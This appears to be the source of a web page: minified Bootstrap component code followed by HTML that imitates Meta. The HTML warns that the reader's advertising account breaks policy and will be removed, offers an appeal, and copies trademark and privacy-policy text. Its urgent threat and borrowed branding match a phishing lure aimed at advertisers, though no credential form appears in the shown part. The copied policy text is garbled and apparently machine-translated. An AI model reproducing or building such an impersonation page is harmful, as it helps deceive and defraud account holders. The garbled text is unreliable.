this._ignoreBackdropClick ? this._ignoreBackdropClick = !1 : t.target === t.currentTarget && (!0 === this._config.backdrop ? this.hide() : "static" === this._config.backdrop && this._triggerBackdropTransition())
}), this._backdrop.show(t)
_isAnimated() {
return this._element.classList.contains("fade")
_triggerBackdropTransition() {
if (P.trigger(this._element, "hidePrevented.bs.modal").defaultPrevented) return;
const {
classList: t,
scrollHeight: e,
style: i
} = this._element, n = e > document.documentElement.clientHeight;
!n && "hidden" === i.overflowY || t.contains("modal-static") || (n || (i.overflowY = "hidden"), t.add("modal-static"), this._queueCallback(() => {
t.remove("modal-static"), n || this._queueCallback(() => {
i.overflowY = ""
}, this._dialog)
}, this._dialog), this._element.focus())
_adjustDialog() {
const t = this._element.scrollHeight > document.documentElement.clientHeight,
e = this._scrollBar.getWidth(),
i = e > 0;
(!i && t && !g() || i && !t && g()) && (this._element.style.paddingLeft = e + "px"), (i && !t && !g() || !i && t && g()) && (this._element.style.paddingRight = e + "px")
_resetAdjustments() {
this._element.style.paddingLeft = "", this._element.style.paddingRight = ""
static jQueryInterface(t, e) {
return this.each((function () {
const i = De.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === i[t]) throw new TypeError(`No method named "${t}"`);
P.on(document, "click.bs.modal.data-api", '[data-bs-toggle="modal"]', (function (t) {
const e = s(this);
["A", "AREA"].includes(this.tagName) && t.preventDefault(), P.one(e, "show.bs.modal", t => {
t.defaultPrevented || P.one(e, "hidden.bs.modal", () => {
c(this) && this.focus()
}), De.getOrCreateInstance(e).toggle(this)
})), _(De);
const Se = {
backdrop: !0,
keyboard: !0,
scroll: !1
Ie = {
backdrop: "boolean",
keyboard: "boolean",
scroll: "boolean"
class Ne extends B {
constructor(t, e) {
super(t), this._config = this._getConfig(e), this._isShown = !1, this._backdrop = this._initializeBackDrop(), this._addEventListeners()
static get NAME() {
return "offcanvas"
static get Default() {
return Se
toggle(t) {
return this._isShown ? this.hide() : this.show(t)
show(t) {
this._isShown || P.trigger(this._element, "show.bs.offcanvas", {
relatedTarget: t
}).defaultPrevented || (this._isShown = !0, this._element.style.visibility = "visible", this._backdrop.show(), this._config.scroll || ((new Te).hide(), this._enforceFocusOnElement(this._element)), this._element.removeAttribute("aria-hidden"), this._element.setAttribute("aria-modal", !0), this._element.setAttribute("role", "dialog"), this._element.classList.add("show"), this._queueCallback(() => {
P.trigger(this._element, "shown.bs.offcanvas", {
relatedTarget: t
}, this._element, !0))
hide() {
this._isShown && (P.trigger(this._element, "hide.bs.offcanvas").defaultPrevented || (P.off(document, "focusin.bs.offcanvas"), this._element.blur(), this._isShown = !1, this._element.classList.remove("show"), this._backdrop.hide(), this._queueCallback(() => {
this._element.setAttribute("aria-hidden", !0), this._element.removeAttribute("aria-modal"), this._element.removeAttribute("role"), this._element.style.visibility = "hidden", this._config.scroll || (new Te).reset(), P.trigger(this._element, "hidden.bs.offcanvas")
}, this._element, !0)))
dispose() {
this._backdrop.dispose(), super.dispose(), P.off(document, "focusin.bs.offcanvas")
_getConfig(t) {
return t = {
..."object" == typeof t ? t : {}
}, l("offcanvas", t, Ie), t
_initializeBackDrop() {
return new ke({
isVisible: this._config.backdrop,
isAnimated: !0,
rootElement: this._element.parentNode,
clickCallback: () => this.hide()
_enforceFocusOnElement(t) {
P.off(document, "focusin.bs.offcanvas"), P.on(document, "focusin.bs.offcanvas", e => {
document === e.target || t === e.target || t.contains(e.target) || t.focus()
}), t.focus()
_addEventListeners() {
P.on(this._element, "click.dismiss.bs.offcanvas", '[data-bs-dismiss="offcanvas"]', () => this.hide()), P.on(this._element, "keydown.dismiss.bs.offcanvas", t => {
this._config.keyboard && "Escape" === t.key && this.hide()
static jQueryInterface(t) {
return this.each((function () {
const e = Ne.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === e[t] || t.startsWith("_") || "constructor" === t) throw new TypeError(`No method named "${t}"`);
P.on(document, "click.bs.offcanvas.data-api", '[data-bs-toggle="offcanvas"]', (function (e) {
const i = s(this);
if (["A", "AREA"].includes(this.tagName) && e.preventDefault(), h(this)) return;
P.one(i, "hidden.bs.offcanvas", () => {
c(this) && this.focus()
const n = t.findOne(".offcanvas.show");
n && n !== i && Ne.getInstance(n).hide(), Ne.getOrCreateInstance(i).toggle(this)
})), P.on(window, "load.bs.offcanvas.data-api", () => t.find(".offcanvas.show").forEach(t => Ne.getOrCreateInstance(t).show())), _(Ne);
const je = new Set(["background", "cite", "href", "itemtype", "longdesc", "poster", "src", "xlink:href"]),
Me = /^(?:(?:https?|mailto|ftp|tel|file):|[^#&/:?]*(?:[#/?]|$))/i,
Pe = /^data:(?:image\/(?:bmp|gif|jpeg|jpg|png|tiff|webp)|video\/(?:mpeg|mp4|ogg|webm)|audio\/(?:mp3|oga|ogg|opus));base64,[\d+/a-z]+=*$/i,
He = (t, e) => {
const i = t.nodeName.toLowerCase();
if (e.includes(i)) return !je.has(i) || Boolean(Me.test(t.nodeValue) || Pe.test(t.nodeValue));
const n = e.filter(t => t instanceof RegExp);
for (let t = 0, e = n.length; t < e; t++)
if (n[t].test(i)) return !0;
return !1
function Re(t, e, i) {
if (!t.length) return t;
if (i && "function" == typeof i) return i(t);
const n = (new window.DOMParser).parseFromString(t, "text/html"),
s = Object.keys(e),
o = [].concat(...n.body.querySelectorAll("*"));
for (let t = 0, i = o.length; t < i; t++) {
const i = o[t],
n = i.nodeName.toLowerCase();
if (!s.includes(n)) {
const r = [].concat(...i.attributes),
a = [].concat(e["*"] || [], e[n] || []);
r.forEach(t => {
He(t, a) || i.removeAttribute(t.nodeName)
return n.body.innerHTML
const Be = new RegExp("(^|\\s)bs-tooltip\\S+", "g"),
We = new Set(["sanitize", "allowList", "sanitizeFn"]),
qe = {
animation: "boolean",
template: "string",
title: "(string|element|function)",
trigger: "string",
delay: "(number|object)",
html: "boolean",
selector: "(string|boolean)",
placement: "(string|function)",
offset: "(array|string|function)",
container: "(string|element|boolean)",
fallbackPlacements: "array",
boundary: "(string|element)",
customClass: "(string|function)",
sanitize: "boolean",
sanitizeFn: "(null|function)",
allowList: "object",
popperConfig: "(null|object|function)"
ze = {
AUTO: "auto",
TOP: "top",
RIGHT: g() ? "left" : "right",
BOTTOM: "bottom",
LEFT: g() ? "right" : "left"
$e = {
animation: !0,
template: '<div class="tooltip" role="tooltip"><div class="tooltip-arrow"></div><div class="tooltip-inner"></div></div>',
trigger: "hover focus",
title: "",
delay: 0,
html: !1,
selector: !1,
placement: "top",
offset: [0, 0],
container: !1,
fallbackPlacements: ["top", "right", "bottom", "left"],
boundary: "clippingParents",
customClass: "",
sanitize: !0,
sanitizeFn: null,
allowList: {
"*": ["class", "dir", "id", "lang", "role", /^aria-[\w-]*$/i],
a: ["target", "href", "title", "rel"],
area: [],
b: [],
br: [],
col: [],
code: [],
div: [],
em: [],
hr: [],
h1: [],
h2: [],
h3: [],
h4: [],
h5: [],
h6: [],
i: [],
img: ["src", "srcset", "alt", "title", "width", "height"],
li: [],
ol: [],
p: [],
pre: [],
s: [],
small: [],
span: [],
sub: [],
sup: [],
strong: [],
u: [],
ul: []
popperConfig: null
Ue = {
HIDE: "hide.bs.tooltip",
HIDDEN: "hidden.bs.tooltip",
SHOW: "show.bs.tooltip",
SHOWN: "shown.bs.tooltip",
INSERTED: "inserted.bs.tooltip",
CLICK: "click.bs.tooltip",
FOCUSIN: "focusin.bs.tooltip",
FOCUSOUT: "focusout.bs.tooltip",
MOUSEENTER: "mouseenter.bs.tooltip",
MOUSELEAVE: "mouseleave.bs.tooltip"
class Fe extends B {
constructor(t, e) {
if (void 0 === fe) throw new TypeError("Bootstrap's tooltips require Popper (https://popper.js.org)");
super(t), this._isEnabled = !0, this._timeout = 0, this._hoverState = "", this._activeTrigger = {}, this._popper = null, this._config = this._getConfig(e), this.tip = null, this._setListeners()
static get Default() {
return $e
static get NAME() {
return "tooltip"
static get Event() {
return Ue
static get DefaultType() {
return qe
enable() {
this._isEnabled = !0
disable() {
this._isEnabled = !1
toggleEnabled() {
this._isEnabled = !this._isEnabled
toggle(t) {
if (this._isEnabled)
if (t) {
const e = this._initializeOnDelegatedTarget(t);
e._activeTrigger.click = !e._activeTrigger.click, e._isWithActiveTrigger() ? e._enter(null, e) : e._leave(null, e)
} else {
if (this.getTipElement().classList.contains("show")) return void this._leave(null, this);
this._enter(null, this)
dispose() {
clearTimeout(this._timeout), P.off(this._element.closest(".modal"), "hide.bs.modal", this._hideModalHandler), this.tip && this.tip.remove(), this._popper && this._popper.destroy(), super.dispose()
show() {
if ("none" === this._element.style.display) throw new Error("Please use show on visible elements");
if (!this.isWithContent() || !this._isEnabled) return;
const t = P.trigger(this._element, this.constructor.Event.SHOW),
i = d(this._element),
n = null === i ? this._element.ownerDocument.documentElement.contains(this._element) : i.contains(this._element);
if (t.defaultPrevented || !n) return;
const s = this.getTipElement(),
o = e(this.constructor.NAME);
s.setAttribute("id", o), this._element.setAttribute("aria-describedby", o), this.setContent(), this._config.animation && s.classList.add("fade");
const r = "function" == typeof this._config.placement ? this._config.placement.call(this, s, this._element) : this._config.placement,
a = this._getAttachment(r);
const {
container: l
} = this._config;
R.set(s, this.constructor.DATA_KEY, this), this._element.ownerDocument.documentElement.contains(this.tip) || (l.appendChild(s), P.trigger(this._element, this.constructor.Event.INSERTED)), this._popper ? this._popper.update() : this._popper = ue(this._element, s, this._getPopperConfig(a)), s.classList.add("show");
const c = "function" == typeof this._config.customClass ? this._config.customClass() : this._config.customClass;
c && s.classList.add(...c.split(" ")), "ontouchstart" in document.documentElement && [].concat(...document.body.children).forEach(t => {
P.on(t, "mouseover", u)
const h = this.tip.classList.contains("fade");
this._queueCallback(() => {
const t = this._hoverState;
this._hoverState = null, P.trigger(this._element, this.constructor.Event.SHOWN), "out" === t && this._leave(null, this)
}, this.tip, h)
hide() {
if (!this._popper) return;
const t = this.getTipElement();
if (P.trigger(this._element, this.constructor.Event.HIDE).defaultPrevented) return;
t.classList.remove("show"), "ontouchstart" in document.documentElement && [].concat(...document.body.children).forEach(t => P.off(t, "mouseover", u)), this._activeTrigger.click = !1, this._activeTrigger.focus = !1, this._activeTrigger.hover = !1;
const e = this.tip.classList.contains("fade");
this._queueCallback(() => {
this._isWithActiveTrigger() || ("show" !== this._hoverState && t.remove(), this._cleanTipClass(), this._element.removeAttribute("aria-describedby"), P.trigger(this._element, this.constructor.Event.HIDDEN), this._popper && (this._popper.destroy(), this._popper = null))
}, this.tip, e), this._hoverState = ""
update() {
null !== this._popper && this._popper.update()
isWithContent() {
return Boolean(this.getTitle())
getTipElement() {
if (this.tip) return this.tip;
const t = document.createElement("div");
return t.innerHTML = this._config.template, this.tip = t.children[0], this.tip
setContent() {
const e = this.getTipElement();
this.setElementContent(t.findOne(".tooltip-inner", e), this.getTitle()), e.classList.remove("fade", "show")
setElementContent(t, e) {
if (null !== t) return r(e) ? (e = a(e), void (this._config.html ? e.parentNode !== t && (t.innerHTML = "", t.appendChild(e)) : t.textContent = e.textContent)) : void (this._config.html ? (this._config.sanitize && (e = Re(e, this._config.allowList, this._config.sanitizeFn)), t.innerHTML = e) : t.textContent = e)
getTitle() {
let t = this._element.getAttribute("data-bs-original-title");
return t || (t = "function" == typeof this._config.title ? this._config.title.call(this._element) : this._config.title), t
updateAttachment(t) {
return "right" === t ? "end" : "left" === t ? "start" : t
_initializeOnDelegatedTarget(t, e) {
const i = this.constructor.DATA_KEY;
return (e = e || R.get(t.delegateTarget, i)) || (e = new this.constructor(t.delegateTarget, this._getDelegateConfig()), R.set(t.delegateTarget, i, e)), e
_getOffset() {
const {
offset: t
} = this._config;
return "string" == typeof t ? t.split(",").map(t => Number.parseInt(t, 10)) : "function" == typeof t ? e => t(e, this._element) : t
_getPopperConfig(t) {
const e = {
placement: t,
modifiers: [{
name: "flip",
options: {
fallbackPlacements: this._config.fallbackPlacements
}, {
name: "offset",
options: {
offset: this._getOffset()
}, {
name: "preventOverflow",
options: {
boundary: this._config.boundary
}, {
name: "arrow",
options: {
element: `.${this.constructor.NAME}-arrow`
}, {
name: "onChange",
enabled: !0,
phase: "afterWrite",
fn: t => this._handlePopperPlacementChange(t)
onFirstUpdate: t => {
t.options.placement !== t.placement && this._handlePopperPlacementChange(t)
return {
..."function" == typeof this._config.popperConfig ? this._config.popperConfig(e) : this._config.popperConfig
_addAttachmentClass(t) {
this.getTipElement().classList.add("bs-tooltip-" + this.updateAttachment(t))
_getAttachment(t) {
return ze[t.toUpperCase()]
_setListeners() {
this._config.trigger.split(" ").forEach(t => {
if ("click" === t) P.on(this._element, this.constructor.Event.CLICK, this._config.selector, t => this.toggle(t));
else if ("manual" !== t) {
const e = "hover" === t ? this.constructor.Event.MOUSEENTER : this.constructor.Event.FOCUSIN,
i = "hover" === t ? this.constructor.Event.MOUSELEAVE : this.constructor.Event.FOCUSOUT;
P.on(this._element, e, this._config.selector, t => this._enter(t)), P.on(this._element, i, this._config.selector, t => this._leave(t))
}), this._hideModalHandler = () => {
this._element && this.hide()
}, P.on(this._element.closest(".modal"), "hide.bs.modal", this._hideModalHandler), this._config.selector ? this._config = {
trigger: "manual",
selector: ""
} : this._fixTitle()
_fixTitle() {
const t = this._element.getAttribute("title"),
e = typeof this._element.getAttribute("data-bs-original-title");
(t || "string" !== e) && (this._element.setAttribute("data-bs-original-title", t || ""), !t || this._element.getAttribute("aria-label") || this._element.textContent || this._element.setAttribute("aria-label", t), this._element.setAttribute("title", ""))
_enter(t, e) {
e = this._initializeOnDelegatedTarget(t, e), t && (e._activeTrigger["focusin" === t.type ? "focus" : "hover"] = !0), e.getTipElement().classList.contains("show") || "show" === e._hoverState ? e._hoverState = "show" : (clearTimeout(e._timeout), e._hoverState = "show", e._config.delay && e._config.delay.show ? e._timeout = setTimeout(() => {
"show" === e._hoverState && e.show()
}, e._config.delay.show) : e.show())
_leave(t, e) {
e = this._initializeOnDelegatedTarget(t, e), t && (e._activeTrigger["focusout" === t.type ? "focus" : "hover"] = e._element.contains(t.relatedTarget)), e._isWithActiveTrigger() || (clearTimeout(e._timeout), e._hoverState = "out", e._config.delay && e._config.delay.hide ? e._timeout = setTimeout(() => {
"out" === e._hoverState && e.hide()
}, e._config.delay.hide) : e.hide())
_isWithActiveTrigger() {
for (const t in this._activeTrigger)
if (this._activeTrigger[t]) return !0;
return !1
_getConfig(t) {
const e = U.getDataAttributes(this._element);
return Object.keys(e).forEach(t => {
We.has(t) && delete e[t]
}), (t = {
..."object" == typeof t && t ? t : {}
}).container = !1 === t.container ? document.body : a(t.container), "number" == typeof t.delay && (t.delay = {
show: t.delay,
hide: t.delay
}), "number" == typeof t.title && (t.title = t.title.toString()), "number" == typeof t.content && (t.content = t.content.toString()), l("tooltip", t, this.constructor.DefaultType), t.sanitize && (t.template = Re(t.template, t.allowList, t.sanitizeFn)), t
_getDelegateConfig() {
const t = {};
if (this._config)
for (const e in this._config) this.constructor.Default[e] !== this._config[e] && (t[e] = this._config[e]);
return t
_cleanTipClass() {
const t = this.getTipElement(),
e = t.getAttribute("class").match(Be);
null !== e && e.length > 0 && e.map(t => t.trim()).forEach(e => t.classList.remove(e))
_handlePopperPlacementChange(t) {
const {
state: e
} = t;
e && (this.tip = e.elements.popper, this._cleanTipClass(), this._addAttachmentClass(this._getAttachment(e.placement)))
static jQueryInterface(t) {
return this.each((function () {
const e = Fe.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === e[t]) throw new TypeError(`No method named "${t}"`);
const Ve = new RegExp("(^|\\s)bs-popover\\S+", "g"),
Ke = {
placement: "right",
offset: [0, 8],
trigger: "click",
content: "",
template: '<div class="popover" role="tooltip"><div class="popover-arrow"></div><h3 class="popover-header"></h3><div class="popover-body"></div></div>'
Xe = {
content: "(string|element|function)"
Ye = {
HIDE: "hide.bs.popover",
HIDDEN: "hidden.bs.popover",
SHOW: "show.bs.popover",
SHOWN: "shown.bs.popover",
INSERTED: "inserted.bs.popover",
CLICK: "click.bs.popover",
FOCUSIN: "focusin.bs.popover",
FOCUSOUT: "focusout.bs.popover",
MOUSEENTER: "mouseenter.bs.popover",
MOUSELEAVE: "mouseleave.bs.popover"
class Qe extends Fe {
static get Default() {
return Ke
static get NAME() {
return "popover"
static get Event() {
return Ye
static get DefaultType() {
return Xe
isWithContent() {
return this.getTitle() || this._getContent()
getTipElement() {
return this.tip || (this.tip = super.getTipElement(), this.getTitle() || t.findOne(".popover-header", this.tip).remove(), this._getContent() || t.findOne(".popover-body", this.tip).remove()), this.tip
setContent() {
const e = this.getTipElement();
this.setElementContent(t.findOne(".popover-header", e), this.getTitle());
let i = this._getContent();
"function" == typeof i && (i = i.call(this._element)), this.setElementContent(t.findOne(".popover-body", e), i), e.classList.remove("fade", "show")
_addAttachmentClass(t) {
this.getTipElement().classList.add("bs-popover-" + this.updateAttachment(t))
_getContent() {
return this._element.getAttribute("data-bs-content") || this._config.content
_cleanTipClass() {
const t = this.getTipElement(),
e = t.getAttribute("class").match(Ve);
null !== e && e.length > 0 && e.map(t => t.trim()).forEach(e => t.classList.remove(e))
static jQueryInterface(t) {
return this.each((function () {
const e = Qe.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === e[t]) throw new TypeError(`No method named "${t}"`);
const Ge = {
offset: 10,
method: "auto",
target: ""
Ze = {
offset: "number",
method: "string",
target: "(string|element)"
class Je extends B {
constructor(t, e) {
super(t), this._scrollElement = "BODY" === this._element.tagName ? window : this._element, this._config = this._getConfig(e), this._selector = `${this._config.target} .nav-link, ${this._config.target} .list-group-item, ${this._config.target} .dropdown-item`, this._offsets = [], this._targets = [], this._activeTarget = null, this._scrollHeight = 0, P.on(this._scrollElement, "scroll.bs.scrollspy", () => this._process()), this.refresh(), this._process()
static get Default() {
return Ge
static get NAME() {
return "scrollspy"
refresh() {
const e = this._scrollElement === this._scrollElement.window ? "offset" : "position",
i = "auto" === this._config.method ? e : this._config.method,
s = "position" === i ? this._getScrollTop() : 0;
this._offsets = [], this._targets = [], this._scrollHeight = this._getScrollHeight(), t.find(this._selector).map(e => {
const o = n(e),
r = o ? t.findOne(o) : null;
if (r) {
const t = r.getBoundingClientRect();
if (t.width || t.height) return [U[i](r).top + s, o]
return null
}).filter(t => t).sort((t, e) => t[0] - e[0]).forEach(t => {
this._offsets.push(t[0]), this._targets.push(t[1])
dispose() {
P.off(this._scrollElement, ".bs.scrollspy"), super.dispose()
_getConfig(t) {
if ("string" != typeof (t = {
..."object" == typeof t && t ? t : {}
}).target && r(t.target)) {
let {
id: i
} = t.target;
i || (i = e("scrollspy"), t.target.id = i), t.target = "#" + i
return l("scrollspy", t, Ze), t
_getScrollTop() {
return this._scrollElement === window ? this._scrollElement.pageYOffset : this._scrollElement.scrollTop
_getScrollHeight() {
return this._scrollElement.scrollHeight || Math.max(document.body.scrollHeight, document.documentElement.scrollHeight)
_getOffsetHeight() {
return this._scrollElement === window ? window.innerHeight : this._scrollElement.getBoundingClientRect().height
_process() {
const t = this._getScrollTop() + this._config.offset,
e = this._getScrollHeight(),
i = this._config.offset + e - this._getOffsetHeight();
if (this._scrollHeight !== e && this.refresh(), t >= i) {
const t = this._targets[this._targets.length - 1];
this._activeTarget !== t && this._activate(t)
} else {
if (this._activeTarget && t < this._offsets[0] && this._offsets[0] > 0) return this._activeTarget = null, void this._clear();
for (let e = this._offsets.length; e--;) this._activeTarget !== this._targets[e] && t >= this._offsets[e] && (void 0 === this._offsets[e + 1] || t < this._offsets[e + 1]) && this._activate(this._targets[e])
_activate(e) {
this._activeTarget = e, this._clear();
const i = this._selector.split(",").map(t => `${t}[data-bs-target="${e}"],${t}[href="${e}"]`),
n = t.findOne(i.join(","));
n.classList.contains("dropdown-item") ? (t.findOne(".dropdown-toggle", n.closest(".dropdown")).classList.add("active"), n.classList.add("active")) : (n.classList.add("active"), t.parents(n, ".nav, .list-group").forEach(e => {
t.prev(e, ".nav-link, .list-group-item").forEach(t => t.classList.add("active")), t.prev(e, ".nav-item").forEach(e => {
t.children(e, ".nav-link").forEach(t => t.classList.add("active"))
})), P.trigger(this._scrollElement, "activate.bs.scrollspy", {
relatedTarget: e
_clear() {
t.find(this._selector).filter(t => t.classList.contains("active")).forEach(t => t.classList.remove("active"))
static jQueryInterface(t) {
return this.each((function () {
const e = Je.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === e[t]) throw new TypeError(`No method named "${t}"`);
P.on(window, "load.bs.scrollspy.data-api", () => {
t.find('[data-bs-spy="scroll"]').forEach(t => new Je(t))
}), _(Je);
class ti extends B {
static get NAME() {
return "tab"
show() {
if (this._element.parentNode && this._element.parentNode.nodeType === Node.ELEMENT_NODE && this._element.classList.contains("active")) return;
let e;
const i = s(this._element),
n = this._element.closest(".nav, .list-group");
if (n) {
const i = "UL" === n.nodeName || "OL" === n.nodeName ? ":scope > li > .active" : ".active";
e = t.find(i, n), e = e[e.length - 1]
const o = e ? P.trigger(e, "hide.bs.tab", {
relatedTarget: this._element
}) : null;
if (P.trigger(this._element, "show.bs.tab", {
relatedTarget: e
}).defaultPrevented || null !== o && o.defaultPrevented) return;
this._activate(this._element, n);
const r = () => {
P.trigger(e, "hidden.bs.tab", {
relatedTarget: this._element
}), P.trigger(this._element, "shown.bs.tab", {
relatedTarget: e
i ? this._activate(i, i.parentNode, r) : r()
_activate(e, i, n) {
const s = (!i || "UL" !== i.nodeName && "OL" !== i.nodeName ? t.children(i, ".active") : t.find(":scope > li > .active", i))[0],
o = n && s && s.classList.contains("fade"),
r = () => this._transitionComplete(e, s, n);
s && o ? (s.classList.remove("show"), this._queueCallback(r, e, !0)) : r()
_transitionComplete(e, i, n) {
if (i) {
const e = t.findOne(":scope > .dropdown-menu .active", i.parentNode);
e && e.classList.remove("active"), "tab" === i.getAttribute("role") && i.setAttribute("aria-selected", !1)
e.classList.add("active"), "tab" === e.getAttribute("role") && e.setAttribute("aria-selected", !0), f(e), e.classList.contains("fade") && e.classList.add("show");
let s = e.parentNode;
if (s && "LI" === s.nodeName && (s = s.parentNode), s && s.classList.contains("dropdown-menu")) {
const i = e.closest(".dropdown");
i && t.find(".dropdown-toggle", i).forEach(t => t.classList.add("active")), e.setAttribute("aria-expanded", !0)
n && n()
static jQueryInterface(t) {
return this.each((function () {
const e = ti.getOrCreateInstance(this);
if ("string" == typeof t) {
if (void 0 === e[t]) throw new TypeError(`No method named "${t}"`);
P.on(document, "click.bs.tab.data-api", '[data-bs-toggle="tab"], [data-bs-toggle="pill"], [data-bs-toggle="list"]', (function (t) {
["A", "AREA"].includes(this.tagName) && t.preventDefault(), h(this) || ti.getOrCreateInstance(this).show()
})), _(ti);
const ei = {
animation: "boolean",
autohide: "boolean",
delay: "number"
ii = {
animation: !0,
autohide: !0,
delay: 5e3
class ni extends B {
constructor(t, e) {
super(t), this._config = this._getConfig(e), this._timeout = null, this._hasMouseInteraction = !1, this._hasKeyboardInteraction = !1, this._setListeners()
static get DefaultType() {
return ei
static get Default() {
return ii
static get NAME() {
return "toast"
show() {
P.trigger(this._element, "show.bs.toast").defaultPrevented || (this._clearTimeout(), this._config.animation && this._element.classList.add("fade"), this._element.classList.remove("hide"), f(this._element), this._element.classList.add("showing"), this._queueCallback(() => {
this._element.classList.remove("showing"), this._element.classList.add("show"), P.trigger(this._element, "shown.bs.toast"), this._maybeScheduleHide()
}, this._element, this._config.animation))
hide() {
this._element.classList.contains("show") && (P.trigger(this._element, "hide.bs.toast").defaultPrevented || (this._element.classList.remove("show"), this._queueCallback(() => {
this._element.classList.add("hide"), P.trigger(this._element, "hidden.bs.toast")
}, this._element, this._config.animation)))
dispose() {
this._clearTimeout(), this._element.classList.contains("show") && this._element.classList.remove("show"), super.dispose()
_getConfig(t) {
return t = {
..."object" == typeof t && t ? t : {}
}, l("toast", t, this.constructor.DefaultType), t
_maybeScheduleHide() {
this._config.autohide && (this._hasMouseInteraction || this._hasKeyboardInteraction || (this._timeout = setTimeout(() => {
}, this._config.delay)))
_onInteraction(t, e) {
switch (t.type) {
case "mouseover":
case "mouseout":
this._hasMouseInteraction = e;
case "focusin":
case "focusout":
this._hasKeyboardInteraction = e
if (e) return void this._clearTimeout();
const i = t.relatedTarget;
this._element === i || this._element.contains(i) || this._maybeScheduleHide()
_setListeners() {
P.on(this._element, "click.dismiss.bs.toast", '[data-bs-dismiss="toast"]', () => this.hide()), P.on(this._element, "mouseover.bs.toast", t => this._onInteraction(t, !0)), P.on(this._element, "mouseout.bs.toast", t => this._onInteraction(t, !1)), P.on(this._element, "focusin.bs.toast", t => this._onInteraction(t, !0)), P.on(this._element, "focusout.bs.toast", t => this._onInteraction(t, !1))
_clearTimeout() {
clearTimeout(this._timeout), this._timeout = null
static jQueryInterface(t) {
return this.each((function () {
const e = ni.getOrCreateInstance(this, t);
if ("string" == typeof t) {
if (void 0 === e[t]) throw new TypeError(`No method named "${t}"`);
return _(ni), {
Alert: W,
Button: q,
Carousel: Z,
Collapse: et,
Dropdown: Ae,
Modal: De,
Offcanvas: Ne,
Popover: Qe,
ScrollSpy: Je,
Tab: ti,
Toast: ni,
Tooltip: Fe
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<h6>Our system has detected that your advertising account does not comply with our Advertising Policy and Community Standards. As a result, your advertising account will be removed from our platform.</h6>
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<h5>How to Appeal</h5><br>
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<h2>What is Trademark Infringement?</h2>
<h6>Generally, trademark infringement occurs when all three of the following requirements are met:</h6>
<il>1. A comilany or person uses a trademark owner's trademark (or similar trademark) without permission.</il><br><br>
<il>2. That use is in commerce, meaning that it's done in connection with the sale or promotion of goods or services.</il><br><br>
<il>3. That use is likely to confuse consumers about the source, endorsement or affiliation of the goods or services.</il>
<p>The touchstone of trademark infringement is often "likelihood of confusion", and there are many factors that determine whether a use of a trademark is likely to cause confusion. For example, when a person's trademark is also used by someone else, but on unrelated goods or services, that use may not be infringement because it may not cause confusion. Which party used the trademark first can often be an important consideration as well.</p>
<h2>Trademark dilution</h2>
<p>Trademark dilution may also be unlawful in certain countries. Dilution, which applies to famous trademarks, may occur in certain circumstances when a trademark is used without permission in commerce. Examples of dilution can include blurring (using the mark for unrelated goods or services in a way that weakens the distinctiveness of the mark) or tarnishment (using the mark in an unflattering or offensive way).</p>
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<h6>For more details, see the User Agreement</h6>
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<span>Account security</span>
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<h4 class="modal-title" id="policyModalLabel">Privacy Policy</h4>
<h5>What is the Privacy Policy and what does it cover?</h5>
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<span class="small-grey">The main thing in the section</span>
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<p>At Meta, we want you to understand what information we collect, how we use it, and with whom we
use it.
let's share. Therefore, we recommend that you read our Privacy Policy. This
will help you use
<a target="_blank" class="add-svg">
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</a>'s products
the way you need.
<p>In the Privacy Policy, we explain how we collect, use, store information, and
We also share it. We also tell you about your rights. Each section of the Policy contains
Useful examples and simplified statements to make our work easier to understand. We also
added links to resources where you can learn in more detail about topics that interest you
with confidentiality.</p>
<p>It is important to us that you know how to manage your privacy (confidentiality), so we also
We show you where in the settings of the Meta Products you use you can manage your data. You
you can
<a target="_blank" class="add-svg">
update these settings
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1ngqms7 x18sheln x1hyyqv4 x1n2onr6 xrhstn2 xn47u6e">
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to personalize your user experience.
The full text of the policy is provided below.
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<span class="small-grey">What products are covered by this policy?</span>
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<span class="small-grey">Learn more about managing your privacy at
Privacy Center</span>
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<h5>What information do we collect?</h5>
The information we collect and process about you depends on how you use our <a class="add-svg">Products
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1ngqms7 x18sheln x1hyyqv4 x1n2onr6 xrhstn2 xn47u6e">
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<path d="M11.292 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z">
For example, we collect different information when you sell
furniture on Marketplace and when you post a Reels video on Instagram. We collect data about you
when you use our Products, <a class="add-svg">even if you do not have an account
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1ngqms7 x18sheln x1hyyqv4 x1n2onr6 xrhstn2 xn47u6e">
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<path d="M11.292 11.293 17.586 5H14a1 1 0 1 1 0-2h6a1 1 0 0 1 1 1v6a1 1 0 1 1-2 0V6.414l-6.293 6.293a1 1 0 0 1-1.414-1.414z">
<p>The following are the types of data we collect:</p>
<div class="action-button-list">
<div class="action-button wide">
<div class="action-button-text">
<span class="small-grey">Your actions and information you provide to us</span>
<div class="action-button-arrow">
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
<path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
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<div class="action-button-text">
<span class="small-grey">Friends, subscribers and other contacts</span>
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<path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
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<span class="small-grey">Application, browser and device information</span>
<div class="action-button-arrow">
<svg viewBox="0 0 24 24" fill="currentColor" width="1em" height="1em" class="x1lliihq x1k90msu x2h7rmj x1qfuztq xcza8v6 xlup9mm x1kky2od">
<path fill-rule="evenodd" clip-rule="evenodd" d="M7.247 4.341a1 1 0 0 1 1.412-.094l8 7a1 1 0 0 1 0 1.506l-8 7a1 1 0 0 1-1.318-1.506L14.482 12l-7.14-6.247a1 1 0 0 1-.094-1.412z">
<div class="action-button wide">
<div class="action-button-text">
<span class="small-grey">Information from Partners, suppliers and other third
